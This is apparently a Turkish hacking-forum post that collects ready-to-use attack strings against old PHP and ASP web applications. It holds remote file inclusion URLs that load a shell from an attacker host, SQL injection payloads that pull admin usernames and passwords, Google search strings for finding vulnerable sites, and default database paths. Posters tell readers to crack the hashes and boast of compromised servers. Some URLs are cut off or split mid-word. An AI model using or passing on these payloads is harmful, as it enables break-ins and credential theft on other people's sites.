Path]/bp_ncom.php?bnrep=http://SHELLURL.COM? Arama kodu:BinGo News 3.01 Aramada kodu powered by BinGo News 3.01 inurl:bp_ncom.php şeklinde çoğaltabilirsiniz.Umarım açıklayıcı olabilmişimdir; Socketwiz Bookmarks <= 2.0 (root_dir) Usage : http://[site target]/[path]/smarty_config.php?root_dir=http://[shell anda].txt? Vivvo Article Manager <= 3.2 (classified_path) Usage : http://[target]/[path]/index.php?classified_path=http://[evil_script]? MyABraCaDaWeb <= 1.0.3 (base) Usage : http://www.site.com/[path]/index.php?base=[shell] atau http://www.site.com/[path]/pop.php?base=[shell] Somery <= 0.4.6 (skin_dir) Usage : http://[domain]/[path]/upload/admin/system/include.php?skindir=http://[url_inclusion_exploit] PhpNews 1.0 (Include) Usage : http://[Target]/[Path]/Include/lib.inc.php3?Include=http://[shell anda] atau http://[Target]/[Path]/Include/variables.php3?Include=http://[shell anda] SL_Site <= 1.0 (spaw_root) Usage : http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[Evil_Script] PayProCart <= 1146078425 Multiple Usage : http://[url]/index.php?proMod=http://shell.txt? Beautifier 0.1 (Core.php) Usage : http://[Target]/[Path]/Beautifier/Core.php?BEAUT_PATH=http://[shell ente]? BinGo News <= 3.01 (bnrep) Usage : http://sitename.com/[Script Path]/bp_ncom.php?bnrep=http://SHELLURL.COM? phpBB Shadow Premod <= 2.7.1 Usage : http://www.site.com/[path]/includes/functions_portal.php?phpbb_root_path=[Evil_Script] phpFullAnnu <= 5.1 (repmod) Usage : http://sitename.com/[Script Path]/modules/home.module.php?repmod=http://SHELLURL.CO M? Akarru <= 0.4.3.34 (bm_content) Usage : http://www.site.com/[path]/akarru.gui/main_content.php?bm_content=[she --------------------------------------------------------------------------------------------------------- ASP Sitelerin DB'lerin Indir / Kriptolu Şifreleri Bul ! Gerekli olanlar Google arama kodu Code: allinurlroddetail.asp?prod= Default mb yolu fpdb/vsproducts.mdb Admin girişi vsadmin/login.asp -------------------------------------------------------------------------------------------------------------- vBulletin 3.6.5 Scriptinde SQL Injection Güvenlik Açığı Script : vBulletin Version : 3.6.5 Saldırı şekli : Code: Hedefsite/Script Yolu/misc.php?sub=profile&name=0\\\\\\')+UNION+SEL ECT+0 ,pass,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_use rs% ------------------------------------------------------------------------------------------------------------ X-ice Haber Script'i Admin K.Adı ve Şifresi Sql Enj. [Md5 Değil!] - Site : ? - Sql : devami.asp?id=-1%20union%20select%201,kullaniciadi,sifre,1,1,1,1, 1%20from%20admin - Konu : X-ice Haber Script'i Sql Enjeksiyon. - Google araması : inurl:default.asp?Xsayfa= - Admin Paneli : /admin --------------------------------------------------------------------------------------------------------------------- Zen Cart Açığı [Garanti] Kendi Geliştirdiğim Arama Kodu Normalde açık vardı fakat arama yapıldığında sitelerin az çıktığından.Yeni bi arama kodu gelistirdim. Arama Kodu : "Zen Cart!, The Art of E-commerce" ("" lar yok) Exploit: index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell adresi? ------------------------------------------------------------------------------------------------------------------ PHPBandManager Index.PHP RFİ Açığı. Uzaktan: Yes Yerel: No Yayınlanması: Apr 26 2007 12:00AM Güncellemesi: Apr 26 2007 10:40PM Kim Buldu: koray Etkilenen: phpBandManager phpBandManager 0.8 Exploit: http://www.example.com/suite/index.p...st.com/c99. txt? Kaynak: http://www.securityfocus.com/bid/23673 Google araması: http://www.google.com.tr/search?hl=t...%3Fpg%3D&* = ------------------------------------------------------------------------------------------------------------------------------- Mini Nuke v2.3 Hack Google.Com'a Girin "Copyright © 2004 Mini-NUKE v2.3 " Yazin Cikan Sitelerin Sonuna pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+ from+members+where+uye_id=1 Bu Kodu Ekleyin Direk Adminin Md5'li Sifresine Ulasiyorsunuz... www.milw0rm.com/ Dan KıraBilirsiniz Ama Bazen Kırılmıyo ------------------------------------------------------------------------------------------------------------------------------- Powered by PHP Live- Genelde Host Şirketleri Kullanılıyor Google Arama : Powered by PHP Live! v3.1 © OSI Codes Inc. Saldırı Şekli: http://www.hedefsite.com/phplive/hel...7shell131.t xt? Aradaşlar genelde host şirketleri kullanıyor bu scripti destek için süper bi açık ben 2 server buldum ------------------------------------------------------------------------------------------------------------ PHP-Ring Webring System 0.9 Portal.......: uPHP_ring_website Tür.........: Sql Injection Attack index.php?ring=Sql.Inject index.php?ring=-1//UNION//SELECT//0,admin_uname,admin_pass/* /FROM//ring_admins/ index.php?ring=-1//UNION//SELECT//0,USER_NAME,USER_PASS,1,2, 3//FROM/**/ring_users/ __________________

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)